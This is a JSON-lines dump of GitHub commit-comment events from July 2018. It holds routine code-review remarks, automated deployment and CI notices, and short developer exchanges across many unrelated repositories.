{"id":"7914651791","type":"CommitCommentEvent","actor":{"login":"Jazun713"},"repo":{"name":"elizabeth0719/Enterprise2TowersWatson"},"payload":{"comment":{"id":29586185,"position":42,"line":42,"path":"Desktop/TowersWatson/Directories.py","commit_id":"22dfcba11503b304322864b34900785ad92a37da","created_at":"2018-07-03T19:46:06Z","updated_at":"2018-07-03T19:46:06Z","author_association":"NONE","body":"Can eliminate in favor of treesize returning a dictionary to consume."}},"created_at":"2018-07-03T19:46:06Z"}
{"id":"7914651888","type":"CommitCommentEvent","actor":{"login":"AliTajeldin"},"repo":{"name":"TresAmigosSD/SMV"},"payload":{"comment":{"id":29586186,"position":null,"line":null,"path":null,"commit_id":"5fce1fdc8fda23a84f6966e26f6264c7e5204fdd","created_at":"2018-07-03T19:46:07Z","updated_at":"2018-07-03T19:46:07Z","author_association":"CONTRIBUTOR","body":"That was the old name for SMV."}},"created_at":"2018-07-03T19:46:07Z"}
{"id":"7914654094","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586190,"position":2,"line":2,"path":"client/call-taker/src/containers/login/login.container.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:46:37Z","updated_at":"2018-07-03T19:46:37Z","author_association":"NONE","body":"Use redux-form library"}},"created_at":"2018-07-03T19:46:37Z"}
{"id":"7914655441","type":"CommitCommentEvent","actor":{"login":"Jazun713"},"repo":{"name":"elizabeth0719/Enterprise2TowersWatson"},"payload":{"comment":{"id":29586196,"position":42,"line":42,"path":"Desktop/TowersWatson/Directories.py","commit_id":"22dfcba11503b304322864b34900785ad92a37da","created_at":"2018-07-03T19:46:56Z","updated_at":"2018-07-03T19:46:56Z","author_association":"NONE","body":"Have alldirs or another new dictionary returned with dirname: {path: path, size:filesize}"}},"created_at":"2018-07-03T19:46:56Z"}
{"id":"7914656126","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586199,"position":5,"line":5,"path":"client/call-taker/src/containers/login/login.container.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:47:06Z","updated_at":"2018-07-03T19:47:06Z","author_association":"NONE","body":"All this styles should be in a scss file"}},"created_at":"2018-07-03T19:47:06Z"}
{"id":"7914657693","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29586202,"position":null,"line":null,"path":null,"commit_id":"1f067024d25f4bbcc0d1895d26e03e10b35a2fb0","created_at":"2018-07-03T19:47:27Z","updated_at":"2018-07-03T19:47:27Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       -3 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |       -1 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4407)*\n"}},"created_at":"2018-07-03T19:47:27Z"}
{"id":"7914657857","type":"CommitCommentEvent","actor":{"login":"m074"},"repo":{"name":"karahtar/Test"},"payload":{"comment":{"id":29586203,"position":null,"line":null,"path":null,"commit_id":"c9a5a44ae9be498d2305d3460884da94dddb9f10","created_at":"2018-07-03T19:47:30Z","updated_at":"2018-07-03T19:47:30Z","author_association":"NONE","body":"Copado"}},"created_at":"2018-07-03T19:47:30Z"}
{"id":"7914658210","type":"CommitCommentEvent","actor":{"login":"m074"},"repo":{"name":"karahtar/Test"},"payload":{"comment":{"id":29586204,"position":null,"line":null,"path":null,"commit_id":"c9a5a44ae9be498d2305d3460884da94dddb9f10","created_at":"2018-07-03T19:47:35Z","updated_at":"2018-07-03T19:47:35Z","author_association":"NONE","body":"ahrekeno\r\n"}},"created_at":"2018-07-03T19:47:35Z"}
{"id":"7914659465","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29586207,"position":null,"line":null,"path":null,"commit_id":"efda7bc9c1836c305f826a6c9ddeb8a5e6ead613","created_at":"2018-07-03T19:47:54Z","updated_at":"2018-07-03T19:47:54Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-42](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-03T19:47:54Z"}
{"id":"7914660478","type":"CommitCommentEvent","actor":{"login":"Ardethian"},"repo":{"name":"kolzchut/mediawiki-extensions-Discovery"},"payload":{"comment":{"id":29586210,"position":null,"line":null,"path":null,"commit_id":"c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9","created_at":"2018-07-03T19:48:09Z","updated_at":"2018-07-03T19:48:09Z","author_association":"COLLABORATOR","body":"> I can change SVG colors if you need a faster response :-)\r\n\r\nGo ahead, knock yourself out :)"}},"created_at":"2018-07-03T19:48:09Z"}
{"id":"7914660604","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586213,"position":21,"line":21,"path":"client/call-taker/src/containers/login/login.container.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:48:10Z","updated_at":"2018-07-03T19:48:10Z","author_association":"NONE","body":"No binding, use arrow functions"}},"created_at":"2018-07-03T19:48:10Z"}
{"id":"7914661420","type":"CommitCommentEvent","actor":{"login":"hezedu"},"repo":{"name":"linux-remote/server"},"payload":{"comment":{"id":29586214,"position":null,"line":null,"path":null,"commit_id":"55fd588e77159cd8bb2a029ddae6b3bdd38b1a8a","created_at":"2018-07-03T19:48:21Z","updated_at":"2018-07-03T19:48:21Z","author_association":"MEMBER","body":"https://github.com/npm/npm/issues/21141"}},"created_at":"2018-07-03T19:48:21Z"}
{"id":"7914663929","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586220,"position":26,"line":26,"path":"client/call-taker/src/containers/login/login.container.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:48:55Z","updated_at":"2018-07-03T19:48:55Z","author_association":"NONE","body":"Use arrow function to avoid binding"}},"created_at":"2018-07-03T19:48:55Z"}
{"id":"7914665514","type":"CommitCommentEvent","actor":{"login":"shyim"},"repo":{"name":"tinect/TinectMailArchive"},"payload":{"comment":{"id":29586225,"position":45,"line":92,"path":"Controllers/Backend/Mailarchive.php","commit_id":"1f608a95fcb0b0e94ce34397806af99db59675f3","created_at":"2018-07-03T19:49:16Z","updated_at":"2018-07-03T19:49:16Z","author_association":"NONE","body":"I would prefer disabling ViewRenderer and ScriptRenderer and just doing $this->Response()->setContent instead a echo with a die,"}},"created_at":"2018-07-03T19:49:16Z"}
{"id":"7914666360","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29586229,"position":null,"line":null,"path":null,"commit_id":"d1be56855696f80d7c8516fc4fb0211772fad1c5","created_at":"2018-07-03T19:49:28Z","updated_at":"2018-07-03T19:49:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-52](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-52).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-52-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-03T19:49:28Z"}
{"id":"7914668958","type":"CommitCommentEvent","actor":{"login":"elemgee"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":29586234,"position":null,"line":null,"path":null,"commit_id":"5af47fae17526fa5e53d56d5c7c281ba1761e85b","created_at":"2018-07-03T19:50:04Z","updated_at":"2018-07-03T19:50:04Z","author_association":"CONTRIBUTOR","body":"Henrique,\r\nI have a question that is tangental to the collectors class here, but it came up because my compile of this was complaining that NSArray didn't implement immutable clone (when clearly it does). I'm sure that is an issue with my build environment, so that's not really the problem.\r\n\r\nMy question is about cloning and why the NSArray class in EREXtensions returns \"this\" for clone and immutable clone. I know that's not your code, but your the smartest guy I know related to this question, so I'm wondering how something can be a clone of itself.\r\nThe code from NSArray is:\r\n\r\n```\r\n\t@Override\r\n\tpublic Object clone() {\r\n\t\treturn this;\r\n\t}\r\n\r\n\tpublic NSArray<E> immutableClone() {\r\n\t\treturn this;\r\n\t}\r\n```\r\n\r\nIs this an optimization relying on the idea that it's immutable so nobody would care if it were the same object?\r\n\r\nThis should be obvious but because I don't necessarily trust myself, I tried a little test to check my logic and this appears to show NSArray not actually making a clone when you ask for one.\r\n```\r\n  val a = new NSArray[String]( \"a\", \"b\", \"c\" )    //> a  : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\")\r\n\r\n  val b = a.immutableClone()                      //> b  : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\")\r\n  \r\n  val c = new NSArray[String](a)                  //> c  : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\")\r\n\r\n  System.identityHashCode(a)                      //> res0: Int = 1204167249\r\n  System.identityHashCode(b)                      //> res1: Int = 1204167249\r\n  System.identityHashCode(c)                      //> res2: Int = 1047503754\r\n```"}},"created_at":"2018-07-03T19:50:04Z"}
{"id":"7914670657","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586239,"position":27,"line":27,"path":"client/call-taker/src/containers/login/login.container.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:50:27Z","updated_at":"2018-07-03T19:50:27Z","author_association":"NONE","body":"With redux-form and a model, you wont need this"}},"created_at":"2018-07-03T19:50:27Z"}
{"id":"7914671222","type":"CommitCommentEvent","actor":{"login":"stefangordon"},"repo":{"name":"Azure/azure-cli"},"payload":{"comment":{"id":29586242,"position":null,"line":null,"path":null,"commit_id":"ee53cc3e6f649678dfc2ec045ece587243095f5c","created_at":"2018-07-03T19:50:34Z","updated_at":"2018-07-03T19:50:34Z","author_association":"CONTRIBUTOR","body":"Does it need to be pinned? Most people ended up pinning to 3.12 last week after the 4.1 debacle, and now this conflicts (including with the Azure SDK test requirements)"}},"created_at":"2018-07-03T19:50:34Z"}
{"id":"7914673586","type":"CommitCommentEvent","actor":{"login":"FreedomFighterSparrow"},"repo":{"name":"kolzchut/mediawiki-extensions-Discovery"},"payload":{"comment":{"id":29586247,"position":null,"line":null,"path":null,"commit_id":"c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9","created_at":"2018-07-03T19:51:07Z","updated_at":"2018-07-03T19:51:07Z","author_association":"MEMBER","body":"What specific color (hex)?\n\nOn 3 July 2018 at 22:48, Tal Koren <notifications@github.com> wrote:\n\n> I can change SVG colors if you need a faster response :-)\n>\n> Go ahead, knock yourself out :)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kolzchut/mediawiki-extensions-Discovery/commit/c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9#commitcomment-29586210>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADQgKxr2qxDOdbEVL2BMm3pJEnE6R7Fdks5uC8p5gaJpZM4VBEDc>\n> .\n>\n"}},"created_at":"2018-07-03T19:51:07Z"}
{"id":"7914673733","type":"CommitCommentEvent","actor":{"login":"BrianJVarley"},"repo":{"name":"BrianJVarley/react-native-prototyping"},"payload":{"comment":{"id":29586248,"position":13,"line":22,"path":"src/modules/squareOffset/SquareOffsetView.js","commit_id":"11d69bcc88e291da608253442e5338e96d636ee6","created_at":"2018-07-03T19:51:10Z","updated_at":"2018-07-03T19:51:10Z","author_association":"OWNER","body":"@SoulKeeperKnight the SettingMenuContainer` state `settings` should not exist in the SquareOffsetView.\r\nThis should _only_ be updated from the `settings` module following the redux pattern.\r\nAs I will add new views later I don't want a copy of settings state for each module.\r\n\r\nPlease revert this commit as its definitely not the right approach.\r\n\r\n\r\nThe ask in the "}},"created_at":"2018-07-03T19:51:10Z"}
{"id":"7914673804","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586249,"position":8,"line":8,"path":"client/call-taker/src/index.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:51:11Z","updated_at":"2018-07-03T19:51:11Z","author_association":"NONE","body":"We dont need this"}},"created_at":"2018-07-03T19:51:11Z"}
{"id":"7914676200","type":"CommitCommentEvent","actor":{"login":"jerinisready"},"repo":{"name":"jerinisready/Blog"},"payload":{"comment":{"id":29586254,"position":null,"line":null,"path":null,"commit_id":"dfd5a7030b9944c2c26deca2792b1741b24b5463","created_at":"2018-07-03T19:51:43Z","updated_at":"2018-07-03T19:51:43Z","author_association":"OWNER","body":"Thank You!   :smiley: "}},"created_at":"2018-07-03T19:51:43Z"}
{"id":"7914676587","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586256,"position":1,"line":1,"path":"client/call-taker/src/registerServiceWorker.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:51:48Z","updated_at":"2018-07-03T19:51:48Z","author_association":"NONE","body":"We will use webpack for this, so this file is not longer need"}},"created_at":"2018-07-03T19:51:48Z"}
{"id":"7914676726","type":"CommitCommentEvent","actor":{"login":"rollno55044"},"repo":{"name":"rollno55044/PYTORCH---implementation-of-models-in-pytorch-framework"},"payload":{"comment":{"id":29586257,"position":null,"line":null,"path":null,"commit_id":"252d89f0fa84f4c13c4457653e598a582f04210d","created_at":"2018-07-03T19:51:49Z","updated_at":"2018-07-03T19:51:49Z","author_association":"OWNER","body":"This repository provides  code for deep learning researchers to learn PyTorch."}},"created_at":"2018-07-03T19:51:49Z"}
{"id":"7914679212","type":"CommitCommentEvent","actor":{"login":"Ardethian"},"repo":{"name":"kolzchut/mediawiki-extensions-Discovery"},"payload":{"comment":{"id":29586261,"position":null,"line":null,"path":null,"commit_id":"c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9","created_at":"2018-07-03T19:52:24Z","updated_at":"2018-07-03T19:52:24Z","author_association":"COLLABORATOR","body":"> What specific color (hex)?\r\n\r\n#355a86"}},"created_at":"2018-07-03T19:52:24Z"}
{"id":"7914679384","type":"CommitCommentEvent","actor":{"login":"shawnmjones"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29586262,"position":null,"line":null,"path":null,"commit_id":"b4834762a432a77ef5e2b31aa2f7a57ecc0edad6","created_at":"2018-07-03T19:52:26Z","updated_at":"2018-07-03T19:52:26Z","author_association":"COLLABORATOR","body":"Thanks. This is not a permanent solution, hence the TODO."}},"created_at":"2018-07-03T19:52:26Z"}
{"id":"7914683145","type":"CommitCommentEvent","actor":{"login":"dhardy"},"repo":{"name":"TheIronBorn/simd_prngs"},"payload":{"comment":{"id":29586268,"position":null,"line":null,"path":null,"commit_id":"2f3402681d5742ff0d2c4bb77727dd0768f133bd","created_at":"2018-07-03T19:53:18Z","updated_at":"2018-07-03T19:53:18Z","author_association":"CONTRIBUTOR","body":"1. `rot % 32 == rot` since it only has 5 bits\r\n2. `0 < 32 - rot ≤ 32`; but if `rot == 0` we ought to shift by `32` on the right — except that shifting by zero effectively combines two copies of the same number via OR, so does nothing\r\n\r\nIn other words, the `% 32` bit does nothing either way. Just remove it?"}},"created_at":"2018-07-03T19:53:18Z"}
{"id":"7914683436","type":"CommitCommentEvent","actor":{"login":"pandameister"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29586269,"position":null,"line":null,"path":null,"commit_id":"b800ad3510621558d0e82213a1e6d7923581c327","created_at":"2018-07-03T19:53:22Z","updated_at":"2018-07-03T19:53:22Z","author_association":"COLLABORATOR","body":"@javascriptkitty  a space is like any other character, eg: `array.push(\" \")` "}},"created_at":"2018-07-03T19:53:22Z"}
{"id":"7914685413","type":"CommitCommentEvent","actor":{"login":"lukerinard"},"repo":{"name":"stonehearth/stonehearth-editor"},"payload":{"comment":{"id":29586276,"position":4,"line":3,"path":"StonehearthEditor/schemas/encounters/elements/bulletin.json","commit_id":"8cee968da3899cc32eb6daa41bfbb6c003a5bcdb","created_at":"2018-07-03T19:53:49Z","updated_at":"2018-07-03T19:53:49Z","author_association":"COLLABORATOR","body":"They're intentional - these seemed to be pointing to the wrong filenames, probably as a copy-paste error from long ago? I just noticed they were wrong and fixed them."}},"created_at":"2018-07-03T19:53:49Z"}
{"id":"7914689048","type":"CommitCommentEvent","actor":{"login":"grs"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29586286,"position":21,"line":478,"path":"lib/connection.js","commit_id":"c68e96a98390effcac787d0aefd26bbbddc67589","created_at":"2018-07-03T19:54:42Z","updated_at":"2018-07-03T19:54:42Z","author_association":"MEMBER","body":"This is not intended to be public."}},"created_at":"2018-07-03T19:54:42Z"}
{"id":"7914690299","type":"CommitCommentEvent","actor":{"login":"akcrosbie"},"repo":{"name":"akcrosbie/datasciencecoursera"},"payload":{"comment":{"id":29586290,"position":null,"line":null,"path":null,"commit_id":"233fa7b9f6c6ea8fb5fa08414350a2f0c9d77b70","created_at":"2018-07-03T19:55:01Z","updated_at":"2018-07-03T19:55:01Z","author_association":"OWNER","body":"[HelloWorld.md.txt](https://github.com/akcrosbie/datasciencecoursera/files/2160829/HelloWorld.md.txt)\r\n"}},"created_at":"2018-07-03T19:55:01Z"}
{"id":"7914691118","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29586291,"position":21,"line":478,"path":"lib/connection.js","commit_id":"c68e96a98390effcac787d0aefd26bbbddc67589","created_at":"2018-07-03T19:55:13Z","updated_at":"2018-07-03T19:55:13Z","author_association":"COLLABORATOR","body":"Nevermind, I recollect that properties like this would be private (no point in exposing them) as we do not expect consumers of rhea to manipulate them."}},"created_at":"2018-07-03T19:55:13Z"}
{"id":"7914691377","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29586293,"position":null,"line":null,"path":null,"commit_id":"a4e3e4eeedb21bf4ef7ba60302433a33febb9c34","created_at":"2018-07-03T19:55:17Z","updated_at":"2018-07-03T19:55:17Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-678](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-678).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-678-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T19:55:17Z"}
{"id":"7914691549","type":"CommitCommentEvent","actor":{"login":"max99x"},"repo":{"name":"stonehearth/stonehearth-editor"},"payload":{"comment":{"id":29586294,"position":4,"line":3,"path":"StonehearthEditor/schemas/encounters/elements/bulletin.json","commit_id":"8cee968da3899cc32eb6daa41bfbb6c003a5bcdb","created_at":"2018-07-03T19:55:20Z","updated_at":"2018-07-03T19:55:20Z","author_association":"COLLABORATOR","body":"Oh. I'm blind. The wrong ones are on the left. I need more coffee when I wake up."}},"created_at":"2018-07-03T19:55:20Z"}
{"id":"7914692383","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29586297,"position":null,"line":null,"path":null,"commit_id":"c4c7594c8583b0ff800902867f5fcb9b475dd506","created_at":"2018-07-03T19:55:32Z","updated_at":"2018-07-03T19:55:32Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       +8 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -830 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4409)*\n"}},"created_at":"2018-07-03T19:55:32Z"}
{"id":"7914693168","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29586299,"position":null,"line":null,"path":null,"commit_id":"2f2ceb6d1cc7753710d470b01bdd0621ed3f2049","created_at":"2018-07-03T19:55:43Z","updated_at":"2018-07-03T19:55:43Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       +8 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -830 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4410)*\n"}},"created_at":"2018-07-03T19:55:43Z"}
{"id":"7914695405","type":"CommitCommentEvent","actor":{"login":"maksbotan"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29586303,"position":180,"line":241,"path":"ui/vty/src/Ariadne/UI/Vty/Widget/Wallet.hs","commit_id":"cb0193a86b089a34773b706429ef58bd8f6bee8d","created_at":"2018-07-03T19:56:18Z","updated_at":"2018-07-03T19:56:18Z","author_association":"CONTRIBUTOR","body":":cho:\r\n\r\nCan you explain somewhere how your widgetParentLens works? "}},"created_at":"2018-07-03T19:56:18Z"}
{"id":"7914696086","type":"CommitCommentEvent","actor":{"login":"maksbotan"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29586306,"position":34,"line":185,"path":"ui/vty/src/Ariadne/UI/Vty/Widget.hs","commit_id":"cb0193a86b089a34773b706429ef58bd8f6bee8d","created_at":"2018-07-03T19:56:29Z","updated_at":"2018-07-03T19:56:29Z","author_association":"CONTRIBUTOR","body":"Huh? "}},"created_at":"2018-07-03T19:56:29Z"}
{"id":"7914704771","type":"CommitCommentEvent","actor":{"login":"chillatgvc"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":29586318,"position":null,"line":null,"path":null,"commit_id":"5af47fae17526fa5e53d56d5c7c281ba1761e85b","created_at":"2018-07-03T19:58:31Z","updated_at":"2018-07-03T19:58:31Z","author_association":"MEMBER","body":"It makes no sense to “clone” an immutable object by creating a new instance.   Clone is only meaningful with a mutable object.  I guess you could call it an optimization.\r\n\r\nChuck\r\n\r\nFrom: Larry Mills-Gahl <notifications@github.com>\r\nReply-To: wocommunity/wonder <reply@reply.github.com>\r\nDate: Tuesday, July 3, 2018 at 12:50 PM\r\nTo: wocommunity/wonder <wonder@noreply.github.com>\r\nCc: Subscribed <subscribed@noreply.github.com>\r\nSubject: Re: [wocommunity/wonder] Add collectors for NSCollection types (5af47fa)\r\n\r\n\r\nHenrique,\r\nI have a question that is tangental to the collectors class here, but it came up because my compile of this was complaining that NSArray didn't implement immutable clone (when clearly it does). I'm sure that is an issue with my build environment, so that's not really the problem.\r\n\r\nMy question is about cloning and why the NSArray class in EREXtensions returns \"this\" for clone and immutable clone. I know that's not your code, but your the smartest guy I know related to this question, so I'm wondering how something can be a clone of itself.\r\nThe code from NSArray is:\r\n\r\n        @Override\r\n\r\n        public Object clone() {\r\n\r\n               return this;\r\n\r\n        }\r\n\r\n\r\n\r\n        public NSArray<E> immutableClone() {\r\n\r\n               return this;\r\n\r\n        }\r\n\r\nIs this an optimization relying on the idea that it's immutable so nobody would care if it were the same object?\r\n\r\nThis should be obvious but because I don't necessarily trust myself, I tried a little test to check my logic and this appears to show NSArray not actually making a clone when you ask for one.\r\n\r\n  val a = new NSArray[String]( \"a\", \"b\", \"c\" )    //> a  : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\")\r\n\r\n\r\n\r\n  val b = a.immutableClone()                      //> b  : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\")\r\n\r\n\r\n\r\n  val c = new NSArray[String](a)                  //> c  : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\")\r\n\r\n\r\n\r\n  System.identityHashCode(a)                      //> res0: Int = 1204167249\r\n\r\n  System.identityHashCode(b)                      //> res1: Int = 1204167249\r\n\r\n  System.identityHashCode(c)                      //> res2: Int = 1047503754\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/wocommunity/wonder/commit/5af47fae17526fa5e53d56d5c7c281ba1761e85b#commitcomment-29586234>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAAMb_KRkJgRTPLVBSQrSt7kDOZxrMi_ks5uC8rtgaJpZM4VBiJP>.\r\n"}},"created_at":"2018-07-03T19:58:31Z"}
{"id":"7914706298","type":"CommitCommentEvent","actor":{"login":"aubincleme"},"repo":{"name":"Remorax/blockly"},"payload":{"comment":{"id":29586347,"position":155,"line":155,"path":"generators/velocity/text.js","commit_id":"c7b7053b57dbf2bbc56fe313f625fe08e366bdad","created_at":"2018-07-03T19:58:48Z","updated_at":"2018-07-03T19:58:48Z","author_association":"NONE","body":"Looks like we have a lot of calls to `getAdjusted()`, but I can't find its definition for Velocity ; is it something missing?"}},"created_at":"2018-07-03T19:58:48Z"}
{"id":"7914708800","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29586351,"position":null,"line":null,"path":null,"commit_id":"2fe6b8598ac4d0e0ac0c2d58dce15260fe261f25","created_at":"2018-07-03T19:59:19Z","updated_at":"2018-07-03T19:59:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-300](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-300).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-300-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-03T19:59:19Z"}
{"id":"7909812309","type":"CommitCommentEvent","actor":{"login":"project3J"},"repo":{"name":"project3J/UploadMedia"},"payload":{"comment":{"id":29574331,"position":null,"line":null,"path":null,"commit_id":"c9e98158f2c2bf28aa59fe423360ef4289391d76","created_at":"2018-07-03T02:01:23Z","updated_at":"2018-07-03T02:01:23Z","author_association":"OWNER","body":"first updat 4m web....f9"}},"created_at":"2018-07-03T02:01:23Z"}
{"id":"7909819639","type":"CommitCommentEvent","actor":{"login":"ashtonsix"},"repo":{"name":"apollographql/apollo-server"},"payload":{"comment":{"id":29574363,"position":null,"line":null,"path":null,"commit_id":"84233d2010af673dc3d54f0f322c9bf0a660b6e5","created_at":"2018-07-03T02:04:19Z","updated_at":"2018-07-03T02:04:19Z","author_association":"NONE","body":"https://github.com/apollographql/apollo-server/issues/1290"}},"created_at":"2018-07-03T02:04:19Z"}
{"id":"7909821052","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire-jlibtorrent"},"payload":{"comment":{"id":29574370,"position":null,"line":null,"path":null,"commit_id":"681909927d50b7e4f6d2f711fc518d9e319e85e0","created_at":"2018-07-03T02:04:54Z","updated_at":"2018-07-03T02:04:54Z","author_association":"COLLABORATOR","body":"Namaste!\r\n![thanks_dalai_lama](https://user-images.githubusercontent.com/163977/42194853-2b5472fe-7e33-11e8-8f86-640f13301eae.jpg)\r\n"}},"created_at":"2018-07-03T02:04:54Z"}
{"id":"7909821352","type":"CommitCommentEvent","actor":{"login":"quequotion"},"repo":{"name":"elementary/wingpanel"},"payload":{"comment":{"id":29574371,"position":null,"line":null,"path":null,"commit_id":"105c1d0c07f5c4b5f7bf67a50dafee742717f17a","created_at":"2018-07-03T02:05:01Z","updated_at":"2018-07-03T02:05:01Z","author_association":"NONE","body":"Somehow this is [preventing indicators' submenus from being displayed](https://github.com/elementary/wingpanel-indicator-ayatana/issues/17).\r\n\r\nThe only examples of indicators with submenus I have are Ayatana indicators, but it may affect native indicators as well if any had submenus."}},"created_at":"2018-07-03T02:05:01Z"}
{"id":"7909821795","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire-jlibtorrent"},"payload":{"comment":{"id":29574375,"position":null,"line":null,"path":null,"commit_id":"681909927d50b7e4f6d2f711fc518d9e319e85e0","created_at":"2018-07-03T02:05:11Z","updated_at":"2018-07-03T02:05:11Z","author_association":"COLLABORATOR","body":"It's so cool to work with @aldenml , what an honor."}},"created_at":"2018-07-03T02:05:11Z"}
{"id":"7909822111","type":"CommitCommentEvent","actor":{"login":"cheeweep"},"repo":{"name":"tixxit/suffixarray"},"payload":{"comment":{"id":29574377,"position":null,"line":null,"path":null,"commit_id":"7ac7ee5c33aec5d5c5f700f422da80e846f13fd4","created_at":"2018-07-03T02:05:18Z","updated_at":"2018-07-03T02:05:18Z","author_association":"NONE","body":"Hi Tom,\r\n\r\nIs the deletion of the copyright notice intentional? If so what is the current licence of this repository?\r\n\r\nThank you,\r\nCheewee"}},"created_at":"2018-07-03T02:05:18Z"}
{"id":"7909822848","type":"CommitCommentEvent","actor":{"login":"tbridge"},"repo":{"name":"tbridge/macadminscomcal"},"payload":{"comment":{"id":29574379,"position":null,"line":null,"path":null,"commit_id":"b28c9fb0037f2d86daa532c23c939dd528f99683","created_at":"2018-07-03T02:05:36Z","updated_at":"2018-07-03T02:05:36Z","author_association":"OWNER","body":"👍👍 "}},"created_at":"2018-07-03T02:05:36Z"}
